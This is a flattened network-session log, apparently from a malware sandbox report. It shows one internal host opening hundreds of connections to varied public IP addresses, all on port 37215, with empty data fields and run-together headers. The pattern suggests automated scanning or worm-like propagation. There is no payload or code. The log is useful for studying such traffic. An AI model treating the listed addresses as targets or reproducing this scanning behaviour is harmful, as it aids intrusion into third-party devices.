                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13270192.168.2.135479241.148.75.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13271192.168.2.135430052.167.240.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13272192.168.2.133780441.228.244.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13273192.168.2.134996454.32.205.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13274192.168.2.1359102116.225.255.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13275192.168.2.135931879.175.216.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13276192.168.2.134585273.18.169.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13277192.168.2.1357070197.0.47.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13278192.168.2.1338212197.199.141.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13279192.168.2.1358386157.181.213.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13280192.168.2.133557214.61.203.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13281192.168.2.133521641.203.57.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13282192.168.2.1358834146.39.104.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13283192.168.2.1340640197.112.192.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13284192.168.2.133918441.24.247.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13285192.168.2.1345828197.240.109.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13286192.168.2.1353006157.241.66.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13287192.168.2.1342658157.14.102.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13288192.168.2.1341764197.230.213.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13289192.168.2.1351086197.65.219.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13290192.168.2.1335646157.4.152.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13291192.168.2.1343554157.77.186.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13292192.168.2.1356762157.33.89.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13293192.168.2.1339838157.245.187.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13294192.168.2.1333838157.18.3.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13295192.168.2.1337046157.78.20.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13296192.168.2.1346962141.131.231.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13297192.168.2.1343354157.18.120.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13298192.168.2.1345078197.65.149.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13299192.168.2.1353766197.149.47.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13300192.168.2.1352472157.58.170.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13301192.168.2.1334864112.112.92.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13302192.168.2.1336456197.90.138.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13303192.168.2.1360980157.154.145.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13304192.168.2.1345586157.48.181.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13305192.168.2.1349110197.136.145.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13306192.168.2.134238641.26.49.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13307192.168.2.135117441.116.199.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13308192.168.2.1356274157.126.177.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13309192.168.2.1341888197.71.150.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13310192.168.2.133462241.23.184.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13311192.168.2.1352270157.47.49.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13312192.168.2.134343241.161.226.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13313192.168.2.1344512150.135.117.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13314192.168.2.1337236197.26.71.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13315192.168.2.133607841.104.241.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13316192.168.2.135331083.70.88.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13317192.168.2.135104441.87.227.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13318192.168.2.1342434114.108.128.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13319192.168.2.1343286137.52.31.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13320192.168.2.133521293.179.102.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13321192.168.2.1348470157.72.137.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13322192.168.2.1357652125.0.135.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13323192.168.2.1340384157.22.36.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13324192.168.2.1356412157.28.189.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13325192.168.2.134212441.138.173.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13326192.168.2.134530080.147.49.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13327192.168.2.133513441.187.69.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13328192.168.2.1344262157.127.74.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13329192.168.2.1349876212.202.91.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13330192.168.2.1342816197.147.149.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13331192.168.2.133459637.5.95.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13332192.168.2.133525032.251.89.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13333192.168.2.1343266157.205.177.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13334192.168.2.134771641.40.141.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13335192.168.2.1349534157.121.105.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13336192.168.2.134098441.185.48.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13337192.168.2.1358212157.172.211.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13338192.168.2.134473841.114.215.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13339192.168.2.1349202197.19.142.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13340192.168.2.1356586197.182.117.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13341192.168.2.1337472157.87.184.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13342192.168.2.134287641.229.61.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13343192.168.2.135762841.36.15.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13344192.168.2.133472841.42.222.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13345192.168.2.134570846.51.219.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13346192.168.2.136030866.9.133.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13347192.168.2.135833874.14.7.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13348192.168.2.133374641.254.46.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13349192.168.2.135367641.128.137.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13350192.168.2.133717441.27.29.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13351192.168.2.134850841.43.38.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13352192.168.2.1358666197.59.237.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13353192.168.2.133716841.236.121.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13354192.168.2.1356898119.106.113.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13355192.168.2.1333446157.194.86.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13356192.168.2.1336298197.142.93.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13357192.168.2.135665441.213.3.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13358192.168.2.1355452197.215.175.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13359192.168.2.1353146197.54.226.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13360192.168.2.1341204157.142.178.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13361192.168.2.1349862174.100.91.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13362192.168.2.134845445.224.99.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13363192.168.2.1359228197.4.40.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13364192.168.2.135830041.68.183.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13365192.168.2.1339540197.225.1.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13366192.168.2.135948868.223.149.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13367192.168.2.1357198197.153.164.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13368192.168.2.1351342157.176.149.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13369192.168.2.1344806157.234.10.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13370192.168.2.1358902157.217.214.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13371192.168.2.1337700199.31.227.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13372192.168.2.1354092213.241.55.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13373192.168.2.1341696157.179.155.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13374192.168.2.1359022197.135.172.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13375192.168.2.1332832197.106.47.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13376192.168.2.1338276197.184.58.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13377192.168.2.1343626157.28.214.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13378192.168.2.1334848145.212.179.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13379192.168.2.1339762131.110.14.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13380192.168.2.133365641.28.221.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13381192.168.2.1339752157.115.30.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13382192.168.2.133399620.144.217.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13383192.168.2.1335148157.20.148.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13384192.168.2.1359602157.196.222.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13385192.168.2.135281241.65.239.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13386192.168.2.1342594197.210.43.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13387192.168.2.1334800123.54.227.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13388192.168.2.1349102202.16.197.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13389192.168.2.1354990157.213.106.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13390192.168.2.1349920157.125.119.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13391192.168.2.1346782197.249.60.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13392192.168.2.134319641.117.95.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13393192.168.2.134320241.60.31.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13394192.168.2.1351992157.66.61.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13395192.168.2.1335244157.206.189.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13396192.168.2.1350560197.93.21.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13397192.168.2.135858242.156.28.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13398192.168.2.1333018197.141.31.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13399192.168.2.1355278208.173.176.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13400192.168.2.1348644157.199.22.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13401192.168.2.1345198161.60.249.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13402192.168.2.1351406197.199.147.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13403192.168.2.134326441.242.159.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13404192.168.2.1357616197.104.73.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13405192.168.2.133833241.220.82.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13406192.168.2.1336738121.154.72.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13407192.168.2.1353746139.137.136.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13408192.168.2.1352430157.121.64.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13409192.168.2.135058841.140.71.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13410192.168.2.1353076157.214.36.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13411192.168.2.133442063.154.112.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13412192.168.2.1345528197.126.215.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13413192.168.2.133609458.251.122.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13414192.168.2.135913241.104.234.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13415192.168.2.1348018157.34.252.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13416192.168.2.133960293.227.207.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13417192.168.2.1352412120.226.108.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13418192.168.2.135421041.2.101.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13419192.168.2.1354230197.149.116.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13420192.168.2.1352454157.136.100.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13421192.168.2.1345024137.243.116.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13422192.168.2.1359618132.223.231.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13423192.168.2.135089041.164.250.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13424192.168.2.1360214197.152.16.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13425192.168.2.1356628157.126.128.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13426192.168.2.1346404157.251.60.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13427192.168.2.133610841.196.141.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13428192.168.2.1350014197.255.153.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13429192.168.2.1351552197.17.220.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13430192.168.2.1348506197.191.24.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13431192.168.2.136013441.42.42.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13432192.168.2.1336158197.161.35.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13433192.168.2.1342674157.65.135.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13434192.168.2.134565041.154.19.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13435192.168.2.134790241.9.44.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13436192.168.2.1344356197.120.107.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13437192.168.2.1340798157.104.58.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13438192.168.2.1359756197.127.205.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13439192.168.2.1356866157.31.57.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13440192.168.2.134296041.78.26.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13441192.168.2.1354840157.136.145.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13442192.168.2.136037284.144.57.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13443192.168.2.1344346197.105.43.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13444192.168.2.1335750157.79.2.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13445192.168.2.1356320157.47.217.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13446192.168.2.135485441.211.224.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13447192.168.2.136013641.230.156.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13448192.168.2.1346472157.187.101.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13449192.168.2.1355574157.89.83.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13450192.168.2.1354358197.76.57.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13451192.168.2.1333928157.246.182.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13452192.168.2.133745641.236.153.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13453192.168.2.135394641.250.196.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13454192.168.2.1338618157.97.106.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13455192.168.2.1340274197.1.65.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13456192.168.2.133746841.8.42.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13457192.168.2.1350032157.19.183.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13458192.168.2.1351098123.217.176.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13459192.168.2.133494841.196.221.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13460192.168.2.1339906157.16.218.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13461192.168.2.134528641.197.69.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13462192.168.2.1353958197.177.225.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13463192.168.2.1348620157.187.99.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13464192.168.2.136052841.196.52.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13465192.168.2.1359826197.71.33.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13466192.168.2.1355512197.144.253.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13467192.168.2.1339634212.39.154.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13468192.168.2.1359700141.56.174.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13469192.168.2.1348726157.236.254.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13470192.168.2.133640096.54.102.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13471192.168.2.1351556139.238.149.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13472192.168.2.134988441.192.174.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13473192.168.2.1358234197.84.216.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13474192.168.2.1347338205.222.177.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13475192.168.2.1354936197.116.28.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13476192.168.2.134793241.70.32.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13477192.168.2.133303268.203.21.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13478192.168.2.133697041.57.7.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
